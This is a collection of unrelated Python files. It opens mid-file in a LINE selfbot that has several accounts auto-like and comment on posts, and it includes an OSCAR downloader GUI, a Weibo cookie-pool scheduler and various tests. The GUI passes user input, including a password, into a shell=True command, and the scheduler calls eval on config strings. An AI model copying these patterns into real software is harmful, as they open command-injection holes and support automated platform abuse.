if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki4.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki5.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto like by ^F.A.F^\nStatus Boss udah Kami Like\nOwner Kami :\nFras")
print "Like"
except:
pass
else:
print "Status Sudah di Like BOS"
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
test_wrappers.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import os
from .common_test_data import *
from reusables import unique, lock_it, time_it, queue_it, setup_logger, \
log_exception, remove_file_handlers, retry_it, catch_it, ReusablesError
@unique(exception=OSError, error_text="WHY ME!")
def unique_function_1(a):
return a
@unique(alt_return=33)
def unique_function_2(a):
return a
@unique(wait=1)
def unique_function_3():
return int(time.time())
class TestWrappers(BaseTestClass):
@classmethod
def tearDownClass(cls):
try:
os.unlink("out.log")
except OSError:
pass
def test_unique(self):
unique_function_1(1)
unique_function_2(1)
try:
unique_function_1(1)
except OSError as err:
assert "WHY ME!" in str(err)
assert unique_function_2(1) == 33
a = unique_function_3()
b = unique_function_3()
c = unique_function_3()
assert c > b > a
def test_locker(self):
import threading
@lock_it()
def func1():
import time
time.sleep(2)
start = time.time()
a = threading.Thread(target=func1)
b = threading.Thread(target=func1)
a.daemon = False
b.daemon = False
a.start()
b.start()
a.join()
b.join()
assert (time.time() - start) > 3
def test_time(self):
my_list = []
@time_it(append=my_list)
def func():
return 5 + 3
@time_it(log=True)
def func2():
return 7 + 3
func()
func2()
assert len(my_list) == 1
assert isinstance(my_list[0], float)
def test_queue(self):
try:
import queue
except ImportError:
import Queue as queue
q = queue.Queue()
@queue_it(q)
def func():
return 5 + 3
func()
assert q.get() == 8
def test_log_exception(self):
"""
Validate the custom log exception is raised correctly.
"""
@log_exception()
def unique_function_4():
raise Exception("Bad")
try:
unique_function_4()
except Exception as err:
assert "Bad" in str(err)
def test_log_exception_message(self):
"""
Validate the message passed to the custom log exception is written
correctly in the logs.
"""
setup_logger("my_logger", file_path="out.log")
message = "I would like to take this moment to say something " \
"interesting has happened. "
@log_exception("my_logger", message=message)
def unique_function_5():
raise Exception("Interesting")
try:
unique_function_5()
except Exception:
pass
remove_file_handlers("my_logger")
with open(os.path.join("out.log"), "r") as f:
assert message in f.readlines()[0]
os.remove(os.path.join("out.log"))
def test_retry_it(self):
@retry_it()
def a():
return True
def handle(herg):
return False
@retry_it(tries=2, wait=1, handler=handle)
def b(a, b=True):
raise Exception("Not yet")
assert a() is True
try:
b()
except ReusablesError:
pass
else:
raise AssertionError("Should have failed")
def test_catch_it(self):
def handle(*args, **kwargs):
print(args, kwargs)
return 10
@catch_it(handler=handle)
def ouch():
raise Exception("Wamp wamp")
@catch_it()
def b(a, b=True):
raise Exception("Not yet")
b()
assert ouch() == 10
if __name__ == "__main__":
unittest.main()
|
app.py | import sys
sys.path.insert(0,"./src/utilities/yolov5/utils")
from src.kafka_module.kf_service import block_segmenter_request_worker, process_block_segmenter_kf
from anuvaad_auditor.loghandler import log_info
from anuvaad_auditor.loghandler import log_error
from flask import Flask
from flask.blueprints import Blueprint
from flask_cors import CORS
from src import routes
import config
import threading
from src.utilities.app_context import LOG_WITHOUT_CONTEXT
merge_app = Flask(__name__)
def start_kafka():
try:
t1 = threading.Thread(target=process_block_segmenter_kf, name='block-segmenter-consumer-thread')
t1.start()
log_info("multithread Kafka running on multithread", LOG_WITHOUT_CONTEXT)
t2 = threading.Thread(target=block_segmenter_request_worker, name='block-segmenter-worker-thread')
t2.start()
log_info("Starting block_segmenter_request_worker", LOG_WITHOUT_CONTEXT)
except Exception as e:
log_error("threading ERROR WHILE RUNNING CUSTOM THREADS ", LOG_WITHOUT_CONTEXT, e)
if config.ENABLE_CORS:
cors = CORS(merge_app, resources={r"/api/*": {"origins": "*"}})
for blueprint in vars(routes).values():
if isinstance(blueprint, Blueprint):
merge_app.register_blueprint(blueprint, url_prefix=config.API_URL_PREFIX)
if __name__ == "__main__":
start_kafka()
print(merge_app.url_map)
merge_app.run(host=config.HOST, port=config.PORT, debug=config.DEBUG)
|
dod_gui.py | import subprocess
import threading
import PySimpleGUI as sg
# oriented this gui on the example at:
# https://raw.githubusercontent.com/PySimpleGUI/PySimpleGUI/069d1d08dc7ec19a8c59d5c13f3b8d60115c286b/UserCreatedPrograms/jumpcutter/jumpcutter_gui.py
def main():
layout = [
[sg.Text("Download OSCAR Corpus", font="Any 20")],
[
sg.Text(
"Username:",
size=(40, 1),
justification="l",
tooltip="the username for login",
),
sg.Input(
default_text="",
key="user",
size=(40, 1),
tooltip="the username for login",
),
],
[
sg.Text(
"Password:",
size=(40, 1),
justification="l",
tooltip="the password for login",
),
sg.Input(
default_text="",
key="password",
size=(40, 1),
tooltip="the password for login",
password_char="*",
),
],
[
sg.Text(
"Url:",
size=(40, 1),
justification="l",
tooltip="the url to download files from",
),
sg.Input(
default_text="",
key="base_url",
size=(40, 1),
tooltip="the url to download files from",
),
],
[
sg.Text(
"Download folder:",
size=(40, 1),
justification="l",
tooltip="the folder where files should be downloaded to",
),
sg.Input(
key="out",
size=(40, 1),
tooltip="the folder where files should be downloaded to",
),
sg.FolderBrowse(),
],
[
sg.Text(
"Chunk size:",
size=(40, 1),
justification="l",
tooltip="the url to download files from",
),
sg.Input(
default_text="4096",
key="chunk_size",
size=(40, 1),
tooltip="specifies in which chunks downloads are to be processed",
enable_events=True,
),
],
[sg.Text("Constructed Command Line:")],
[
sg.Text(
size=(80, 3),
key="cmd",
text_color="yellow",
font="Courier 8",
)
],
[
sg.MLine(
size=(80, 10),
reroute_stdout=True,
reroute_stderr=True,
reroute_cprint=True,
write_only=True,
font="Courier 8",
autoscroll=True,
key="mline",
auto_refresh=True,
)
],
[sg.Button("Start"), sg.Button("Exit")],
]
window = sg.Window("Download OSCAR Corpus", layout, finalize=True)
event_loop(window)
def event_loop(window):
proc = None
t_read = None
try:
while True:
event, values = window.read()
if event in (sg.WIN_CLOSED, "Exit"):
break
if event == "chunk_size" and values["chunk_size"]:
validate_int(window, "chunk_size", values)
if event == "Start":
user, password, base_url, out, _, chunk_size = values.values()
command = f"dodc --user={user} --password={password} --base_url={base_url} --chunk_size={chunk_size} --out={out}"
window["cmd"].update(command)
window.refresh()
proc = subprocess.Popen(
command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
t_read = threading.Thread(target=read_stdout, args=(proc, window))
t_read.start()
finally:
window.close()
if proc is not None:
proc.terminate()
if t_read is not None:
t_read.join()
def read_stdout(proc, window):
for line in proc.stdout:
print(line.decode().strip())
window.refresh()
def validate_int(window, key, values):
try:
int(values[key])
except Exception:
sg.popup("Only integer values allowed.")
window[key].update(values[key][:-1])
if __name__ == "__main__":
main()
|
bsv-pbv-submitblock.py | #!/usr/bin/env python3
# Copyright (c) 2019 Bitcoin Association
# Distributed under the Open BSV software license, see the accompanying file LICENSE.
"""
We will test the following situation where block 1 is the tip and three blocks
are sent for parallel validation:
1
/ | \
2 3 4
Blocks 2,4 are hard to validate and block 3 is easy to validate.
- Blocks 2,3 are sent via p2p.
- Block 4 is submitted via rpc command submitblock.
Block 3 should be active in the end because it was easiest to validate and
therefore won the validation race.
*This test is similar to bsv-pbv-submitminingsolution.py which uses different RPC call to
submit the block.
Additionally this test also checks that blocks with same height but later arrival
are also announced to the network after being validated. (lines marked with ***
at the beginning of comments)
"""
import threading
from test_framework.util import (
assert_equal,
p2p_port,
get_rpc_proxy,
rpc_url,
get_datadir_path,
wait_until
)
from test_framework.mininode import (
NetworkThread,
NodeConn,
NodeConnCB,
msg_block,
msg_sendcmpct,
msg_getheaders,
ToHex,
CInv
)
from test_framework.test_framework import BitcoinTestFramework, ChainManager
from bsv_pbv_common import (
wait_for_waiting_blocks,
wait_for_validating_blocks
)
class PBVSubmitBlock(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.chain = ChainManager()
self.extra_args = [["-whitelist=127.0.0.1"]]
def run_test(self):
block_count = 0
# Create a P2P connections
node0 = NodeConnCB()
connection0 = NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0)
node0.add_connection(connection0)
node1 = NodeConnCB()
connection1 = NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node1)
node1.add_connection(connection1)
# *** Prepare node connection for early announcements testing
node2 = NodeConnCB()
node2.add_connection(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node2))
NetworkThread().start()
# wait_for_verack ensures that the P2P connection is fully up.
node0.wait_for_verack()
node1.wait_for_verack()
# *** Activate early announcement functionality for this connection
# After this point the early announcements are not received yet -
# we still need to set latest announced block (CNode::pindexBestKnownBlock)
# which is set for e.g. by calling best headers message with locator
# set to non-null
node2.wait_for_verack()
node2.send_message(msg_sendcmpct(announce=True))
self.chain.set_genesis_hash(int(self.nodes[0].getbestblockhash(), 16))
block = self.chain.next_block(block_count)
block_count += 1
self.chain.save_spendable_output()
node0.send_message(msg_block(block))
for i in range(100):
block = self.chain.next_block(block_count)
block_count += 1
self.chain.save_spendable_output()
node0.send_message(msg_block(block))
out = self.chain.get_spendable_output()
self.log.info("waiting for block height 101 via rpc")
self.nodes[0].waitforblockheight(101)
tip_block_num = block_count - 1
# adding extra transactions to get different block hashes
block2_hard = self.chain.next_block(block_count, spend=out, extra_txns=8)
block_count += 1
self.chain.set_tip(tip_block_num)
block3_easier = self.chain.next_block(block_count, spend=out, extra_txns=2)
block_count += 1
self.chain.set_tip(tip_block_num)
block4_hard = self.chain.next_block(block_count, spend=out, extra_txns=10)
block_count += 1
# send three "hard" blocks, with waitaftervalidatingblock we artificially
# extend validation time.
self.log.info(f"hard block2 hash: {block2_hard.hash}")
self.nodes[0].waitaftervalidatingblock(block2_hard.hash, "add")
self.log.info(f"hard block4 hash: {block4_hard.hash}")
self.nodes[0].waitaftervalidatingblock(block4_hard.hash, "add")
# make sure block hashes are in waiting list
wait_for_waiting_blocks({block2_hard.hash, block4_hard.hash}, self.nodes[0], self.log)
# *** Complete early announcement setup by sending getheaders message
# with a non-null locator (pointing to the last block that we know
# of on python side - we claim that we know of all the blocks that
# bitcoind node knows of)
#
# We also set on_cmpctblock handler as early announced blocks are
# announced via compact block messages instead of inv messages
node2.send_and_ping(msg_getheaders(locator_have=[int(self.nodes[0].getbestblockhash(), 16)]))
receivedAnnouncement = False
waiting_for_announcement_block_hash = block2_hard.sha256
def on_cmpctblock(conn, message):
nonlocal receivedAnnouncement
message.header_and_shortids.header.calc_sha256()
if message.header_and_shortids.header.sha256 == waiting_for_announcement_block_hash:
receivedAnnouncement = True
node2.on_cmpctblock = on_cmpctblock
# send one block via p2p and one via rpc
node0.send_message(msg_block(block2_hard))
# *** make sure that we receive announcement of the block before it has
# been validated
wait_until(lambda: receivedAnnouncement)
# making rpc call submitblock in a separate thread because waitaftervalidation is blocking
# the return of submitblock
submitblock_thread = threading.Thread(target=self.nodes[0].submitblock, args=(ToHex(block4_hard),))
submitblock_thread.start()
# because self.nodes[0] rpc is blocked we use another rpc client
rpc_client = get_rpc_proxy(rpc_url(get_datadir_path(self.options.tmpdir, 0), 0), 0,
coveragedir=self.options.coveragedir)
wait_for_validating_blocks({block2_hard.hash, block4_hard.hash}, rpc_client, self.log)
# *** prepare to intercept block3_easier announcement - it will not be
# announced before validation is complete as early announcement is
# limited to announcing one block per height (siblings are ignored)
# but after validation is complete we should still get the announcing
# compact block message
receivedAnnouncement = False
waiting_for_announcement_block_hash = block3_easier.sha256
self.log.info(f"easy block3 hash: {block3_easier.hash}")
node1.send_message(msg_block(block3_easier))
# *** Make sure that we receive compact block announcement of the block
# after the validation is complete even though it was not the first
# block that was received by bitcoind node.
#
# Also make sure that we receive inv announcement of the block after
# the validation is complete by the nodes that are not using early
# announcement functionality.
wait_until(lambda: receivedAnnouncement)
node0.wait_for_inv([CInv(2, block3_easier.sha256)]) # 2 == GetDataMsg::MSG_BLOCK
# node 1 was the sender but receives inv for block non the less
# (with early announcement that's not the case - sender does not receive the announcement)
node1.wait_for_inv([CInv(2, block3_easier.sha256)]) # 2 == GetDataMsg::MSG_BLOCK
rpc_client.waitforblockheight(102)
assert_equal(block3_easier.hash, rpc_client.getbestblockhash())
# now we can remove waiting status from blocks and finish their validation
rpc_client.waitaftervalidatingblock(block2_hard.hash, "remove")
rpc_client.waitaftervalidatingblock(block4_hard.hash, "remove")
submitblock_thread.join()
# wait till validation of block or blocks finishes
node0.sync_with_ping()
# easier block should still be on tip
assert_equal(block3_easier.hash, self.nodes[0].getbestblockhash())
if __name__ == '__main__':
PBVSubmitBlock().main()
|
emails.py | #!/usr/bin/python3
"""
@Author : Zhaohui Mei(梅朝辉)
@Email : mzh.whut@gmail.com
@Time : 2018/12/1 10:37
@File : emails.py
@Version : 1.0
@Interpreter: Python3.6.2
@Software: PyCharm
@Description: 邮件通知设置
"""
from threading import Thread
from flask import url_for, current_app
from flask_mail import Message
from bluelog.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_async_mail(subject, to, html):
"""异步发送邮件"""
app = current_app._get_current_object() # 获取被代理的真实对象
message = Message(subject, recipients=[to], html=html)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_new_comment_email(post):
post_url = url_for('blog.show_post', post_id=post.id,
_external=True) + '#comments'
send_async_mail(
subject='New Comment',
to=current_app.config['BLUELOG_ADMIN_EMAIL'],
html=f'<p>New comment in post <i>{post.title}</i>,'
f' click the link below to check:</p>'
f'<p><a href="{post_url}">{post_url}</a></p>'
f'<p><small style="color:#868e96">'
f'Do not reply this email.</small></p>'
)
def send_new_reply_email(comment):
post_url = url_for('blog.show_post', post_id=comment.post_id,
_external=True) + '#comments'
send_async_mail(
subject='New Reply',
to=comment.email,
html=f'<p>New reply for the comment you left in post <i>{comment.post.title}</i>,'
f' click the link below to check:</p>'
f'<p><a href="{post_url}">{post_url}</a></p>'
f'<p><small style="color:#868e96">'
f'Do not reply this email.</small></p>'
)
|
scheduler.py | import time
import traceback
from multiprocessing import Process
from cookiespool.api import app
from cookiespool.config import CYCLE, TESTER_MAP, API_PORT, API_HOST, API_PROCESS, GENERATOR_PROCESS, VALID_PROCESS
from cookiespool.config import GENERATOR_MAP
from cookiespool.tester import WeiboValidTester
from cookiespool.generator import WeiboCookiesGenerator
class Scheduler(object):
@staticmethod
def valid_cookie(cycle=CYCLE):
while True:
print('Cookies检测进程开始运行')
try:
for website, cls in TESTER_MAP.items():
tester = eval(cls + '(website="' + website + '")')
tester.run()
print('Cookies检测完成')
del tester
time.sleep(cycle)
except Exception as e:
print(e.args)
print(traceback.format_exc())
@staticmethod
def generate_cookie(cycle=CYCLE):
while True:
print('Cookies生成进程开始运行')
try:
for website, cls in GENERATOR_MAP.items():
generator = eval(cls + '(website="' + website + '")')
generator.run()
print('Cookies生成完成')
time.sleep(cycle)
except Exception as e:
print(e.args)
print(traceback.format_exc())
@staticmethod
def api():
print('API接口开始运行')
app.run(host=API_HOST, port=API_PORT)
def run(self):
# API服务运行
if API_PROCESS:
api_process = Process(target=Scheduler.api)
api_process.start()
# 自动检测新添加的账号及生成cookie服务
if GENERATOR_PROCESS:
generate_process = Process(target=Scheduler.generate_cookie)
generate_process.start()
# 检查cookie是否有效服务
if VALID_PROCESS:
valid_process = Process(target=Scheduler.valid_cookie)
valid_process.start()
|
runblast.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from threading import Thread, Event
import time
# import threading
import psutil
import datetime
import os
import subprocess
# command = "blastn -db nt -evalue 1e-05 -query arquivo.fasta -out arquivoblast"
#monitor cpu and memory
# [1:09 PM, 3/14/2016] Mauro: Monitorar o desempenho das máquinas (se alcançam o máximo de CPU ou memória; se travam)
# [1:10 PM, 3/14/2016] Mauro: E verificar a relação (tamanho, no de reads, no de hits) entre os arquivos de entrada e saída.
# Raony, sugiro:
# 1) Pega 1 dos arquivos 'good', quebra ele em diferentes tamanhos: 50, 25, 12.5, 6.25, 3.125 1,5625% do original
# 2) Roda cada um em um webservice diferente, em instâncias padrão da AWS de aproximadamente 8, 20 e 50 Gb de RAM, com o processamento correspondente.
# 3) monitore: tempo de processamento em cada instância, uso médio da CPU e da RAM, tamanho do arquivo de saída.
# 4) quando fragmentar o arquivo inicial em pedaços de 6,25% do total, coloque 8 deles (~50%) na fila do mesmo webservice pra monitorar o tempo de execução e comparar com 1 arquivo de 50%
output = open("monitor.log", "w")
def monitor(arg1, stop_event):
while(not stop_event.is_set()):
cpu = psutil.cpu_percent(interval=1)
mem = psutil.virtual_memory()
output_list = []
output_list.append("DATE:"+str(datetime.datetime.now()))
used = mem.total - mem.available
output_list.append("CPU:"+str(cpu))
output_list.append("MEMORY:"+str(int(used / 1024 / 1024))+" MB")
output.writelines("\t".join(output_list)+"\n")
print(output_list)
t2_stop= Event()
monitor = Thread(target=monitor, args=(2, t2_stop))
monitor.start()
#run blasts
sizes = [0.015625, 0.03125, 0.0625, 0.125, 0.25, 0.5]
for size in sizes:
print("Running BLAST for %s \n" % (size))
output.writelines("Running BLAST for %s \n" % (size))
file_prefix = str(size).replace('.','_')
filename = "test_blast_%s.fasta" % (file_prefix)
command = "time blastn -db nt -evalue 1e-05 -query %s -out blast_output_%s.fasta" % (filename, file_prefix)
# command = """echo "blast" """
command = "sleep 2"
out = subprocess.check_output(command.split())
print(out.decode("utf-8") )
output.writelines(out)
#teste com 8 arquivos 0.0625
size = 0.0625
print("Running 8 BLASTS for %s \n" % (size))
output.writelines("Running 8 BLASTS for %s \n" % (size))
for i in range(1,9):
print(i)
output.writelines(str(i)+"\n")
file_prefix = str(size).replace('.','_')
filename = "test_blast_%s.fasta" % (file_prefix)
command = "time blastn -db nt -evalue 1e-05 -query %s -out blast_output_%s.fasta" % (filename, file_prefix)
command = "sleep 2"
out = subprocess.check_output(command.split())
print(out.decode("utf-8") )
output.writelines(out)
#stop monitor
t2_stop.set()
monitor.join()
output.close()
|
test_runtimes.py | import asyncio
import json
import multiprocessing
import threading
import time
from collections import defaultdict
import pytest
from jina import Client, Document, Executor, requests
from jina.enums import PollingType
from jina.parsers import set_gateway_parser, set_pod_parser
from jina.serve.runtimes.asyncio import AsyncNewLoopRuntime
from jina.serve.runtimes.gateway.grpc import GRPCGatewayRuntime
from jina.serve.runtimes.gateway.http import HTTPGatewayRuntime
from jina.serve.runtimes.gateway.websocket import WebSocketGatewayRuntime
from jina.serve.runtimes.head import HeadRuntime
from jina.serve.runtimes.worker import WorkerRuntime
@pytest.mark.asyncio
# test gateway, head and worker runtime by creating them manually in the most simple configuration
async def test_runtimes_trivial_topology(port_generator):
worker_port = port_generator()
head_port = port_generator()
port = port_generator()
graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
pod_addresses = f'{{"pod0": ["0.0.0.0:{head_port}"]}}'
# create a single worker runtime
worker_process = multiprocessing.Process(
target=_create_worker_runtime, args=(worker_port,)
)
worker_process.start()
# create a single head runtime
connection_list_dict = {'0': [f'127.0.0.1:{worker_port}']}
head_process = multiprocessing.Process(
target=_create_head_runtime, args=(head_port, connection_list_dict)
)
head_process.start()
# create a single gateway runtime
gateway_process = multiprocessing.Process(
target=_create_gateway_runtime,
args=(graph_description, pod_addresses, port),
)
gateway_process.start()
await asyncio.sleep(1.0)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{head_port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{worker_port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
# send requests to the gateway
c = Client(host='localhost', port=port, asyncio=True)
responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
response_list = []
async for response in responses:
response_list.append(response)
# clean up runtimes
gateway_process.terminate()
head_process.terminate()
worker_process.terminate()
gateway_process.join()
head_process.join()
worker_process.join()
assert len(response_list) == 20
assert len(response_list[0].docs) == 1
assert gateway_process.exitcode == 0
assert head_process.exitcode == 0
assert worker_process.exitcode == 0
@pytest.fixture
def complete_graph_dict():
return {
'start-gateway': ['pod0', 'pod4', 'pod6'],
'pod0': ['pod1', 'pod2'],
'pod1': ['end-gateway'],
'pod2': ['pod3'],
'pod4': ['pod5'],
'merger': ['pod_last'],
'pod5': ['merger'],
'pod3': ['merger'],
'pod6': [], # hanging_pod
'pod_last': ['end-gateway'],
}
@pytest.mark.asyncio
@pytest.mark.parametrize('uses_before', [True, False])
@pytest.mark.parametrize('uses_after', [True, False])
# test gateway, head and worker runtime by creating them manually in a more Flow like topology with branching/merging
async def test_runtimes_flow_topology(
complete_graph_dict, uses_before, uses_after, port_generator
):
pods = [
pod_name for pod_name in complete_graph_dict.keys() if 'gateway' not in pod_name
]
runtime_processes = []
pod_addresses = '{'
for pod in pods:
if uses_before:
uses_before_port, uses_before_process = await _create_worker(
pod, port_generator, type='uses_before'
)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ready_or_shutdown_event=threading.Event(),
ctrl_address=f'127.0.0.1:{uses_before_port}',
)
runtime_processes.append(uses_before_process)
if uses_after:
uses_after_port, uses_after_process = await _create_worker(
pod, port_generator, type='uses_after'
)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ready_or_shutdown_event=threading.Event(),
ctrl_address=f'127.0.0.1:{uses_after_port}',
)
runtime_processes.append(uses_after_process)
# create worker
worker_port, worker_process = await _create_worker(pod, port_generator)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ready_or_shutdown_event=threading.Event(),
ctrl_address=f'127.0.0.1:{worker_port}',
)
runtime_processes.append(worker_process)
# create head
head_port = port_generator()
pod_addresses += f'"{pod}": ["0.0.0.0:{head_port}"],'
connection_list_dict = {'0': [f'127.0.0.1:{worker_port}']}
head_process = multiprocessing.Process(
target=_create_head_runtime,
args=(
head_port,
connection_list_dict,
f'{pod}/head',
'ANY',
f'127.0.0.1:{uses_before_port}' if uses_before else None,
f'127.0.0.1:{uses_after_port}' if uses_after else None,
),
)
runtime_processes.append(head_process)
head_process.start()
await asyncio.sleep(0.1)
# remove last comma
pod_addresses = pod_addresses[:-1]
pod_addresses += '}'
port = port_generator()
# create a single gateway runtime
gateway_process = multiprocessing.Process(
target=_create_gateway_runtime,
args=(json.dumps(complete_graph_dict), pod_addresses, port),
)
gateway_process.start()
await asyncio.sleep(0.1)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
# send requests to the gateway
c = Client(host='localhost', port=port, asyncio=True)
responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
response_list = []
async for response in responses:
response_list.append(response)
# clean up runtimes
gateway_process.terminate()
for process in runtime_processes:
process.terminate()
gateway_process.join()
for process in runtime_processes:
process.join()
assert len(response_list) == 20
assert len(response_list[0].docs) == 1
assert gateway_process.exitcode == 0
for process in runtime_processes:
assert process.exitcode == 0
@pytest.mark.asyncio
@pytest.mark.parametrize('polling', ['ALL', 'ANY'])
# test simple topology with shards
async def test_runtimes_shards(polling, port_generator):
head_port = port_generator()
port = port_generator()
graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
pod_addresses = f'{{"pod0": ["0.0.0.0:{head_port}"]}}'
# create the shards
shard_processes = []
worker_ports = []
connection_list_dict = defaultdict(list)
for i in range(10):
# create worker
worker_port = port_generator()
# create a single worker runtime
worker_process = multiprocessing.Process(
target=_create_worker_runtime, args=(worker_port, f'pod0/shard/{i}')
)
shard_processes.append(worker_process)
worker_process.start()
await asyncio.sleep(0.1)
worker_ports.append(worker_port)
connection_list_dict[i].append(f'127.0.0.1:{worker_port}')
# create a single head runtime
head_process = multiprocessing.Process(
target=_create_head_runtime,
args=(head_port, connection_list_dict, 'head', polling),
)
head_process.start()
# create a single gateway runtime
gateway_process = multiprocessing.Process(
target=_create_gateway_runtime,
args=(graph_description, pod_addresses, port),
)
gateway_process.start()
await asyncio.sleep(1.0)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
c = Client(host='localhost', port=port, asyncio=True)
responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
response_list = []
async for response in responses:
response_list.append(response)
# clean up runtimes
gateway_process.terminate()
head_process.terminate()
for shard_process in shard_processes:
shard_process.terminate()
gateway_process.join()
head_process.join()
for shard_process in shard_processes:
shard_process.join()
assert len(response_list) == 20
assert len(response_list[0].docs) == 1 if polling == 'ANY' else len(shard_processes)
assert gateway_process.exitcode == 0
assert head_process.exitcode == 0
for shard_process in shard_processes:
assert shard_process.exitcode == 0
@pytest.mark.asyncio
# test simple topology with replicas
async def test_runtimes_replicas(port_generator):
head_port = port_generator()
port = port_generator()
graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
pod_addresses = f'{{"pod0": ["0.0.0.0:{head_port}"]}}'
# create the shards
replica_processes = []
worker_ports = []
connection_list_dict = defaultdict(list)
for i in range(10):
# create worker
worker_port = port_generator()
# create a single worker runtime
worker_process = multiprocessing.Process(
target=_create_worker_runtime, args=(worker_port, f'pod0/{i}')
)
replica_processes.append(worker_process)
worker_process.start()
await asyncio.sleep(0.1)
worker_ports.append(worker_port)
connection_list_dict[0].append(f'127.0.0.1:{worker_port}')
# create a single head runtime
head_process = multiprocessing.Process(
target=_create_head_runtime, args=(head_port, connection_list_dict, 'head')
)
head_process.start()
# create a single gateway runtime
gateway_process = multiprocessing.Process(
target=_create_gateway_runtime,
args=(graph_description, pod_addresses, port),
)
gateway_process.start()
await asyncio.sleep(1.0)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
c = Client(host='localhost', port=port, asyncio=True)
responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
response_list = []
async for response in responses:
response_list.append(response)
# clean up runtimes
gateway_process.terminate()
head_process.terminate()
for replica_process in replica_processes:
replica_process.terminate()
gateway_process.join()
head_process.join()
for replica_process in replica_processes:
replica_process.join()
assert len(response_list) == 20
assert len(response_list[0].docs) == 1
assert gateway_process.exitcode == 0
assert head_process.exitcode == 0
for replica_process in replica_processes:
assert replica_process.exitcode == 0
@pytest.mark.asyncio
async def test_runtimes_with_executor(port_generator):
graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
runtime_processes = []
uses_before_port, uses_before_process = await _create_worker(
'pod0', port_generator, type='uses_before', executor='NameChangeExecutor'
)
runtime_processes.append(uses_before_process)
uses_after_port, uses_after_process = await _create_worker(
'pod0', port_generator, type='uses_after', executor='NameChangeExecutor'
)
runtime_processes.append(uses_after_process)
# create head
head_port = port_generator()
pod_addresses = f'{{"pod0": ["0.0.0.0:{head_port}"]}}'
# create some shards
connection_list_dict = defaultdict(list)
worker_ports = []
for i in range(10):
# create worker
worker_port, worker_process = await _create_worker(
'pod0', port_generator, type=f'shards/{i}', executor='NameChangeExecutor'
)
runtime_processes.append(worker_process)
await asyncio.sleep(0.1)
worker_ports.append(worker_port)
connection_list_dict[i].append(f'127.0.0.1:{worker_port}')
head_process = multiprocessing.Process(
target=_create_head_runtime,
args=(
head_port,
connection_list_dict,
f'pod0/head',
'ALL',
f'127.0.0.1:{uses_before_port}',
f'127.0.0.1:{uses_after_port}',
),
)
runtime_processes.append(head_process)
head_process.start()
# create a single gateway runtime
port = port_generator()
gateway_process = multiprocessing.Process(
target=_create_gateway_runtime,
args=(graph_description, pod_addresses, port),
)
gateway_process.start()
runtime_processes.append(gateway_process)
await asyncio.sleep(1.0)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
c = Client(host='localhost', port=port, asyncio=True)
responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
response_list = []
async for response in responses:
response_list.append(response.docs)
# clean up runtimes
for process in runtime_processes:
process.terminate()
for process in runtime_processes:
process.join()
assert len(response_list) == 20
assert (
len(response_list[0]) == (1 + 1 + 1) * 10 + 1
) # 1 starting doc + 1 uses_before + every exec adds 1 * 10 shards + 1 doc uses_after
doc_texts = [doc.text for doc in response_list[0]]
assert doc_texts.count('client0-Request') == 10
assert doc_texts.count('pod0/uses_before') == 10
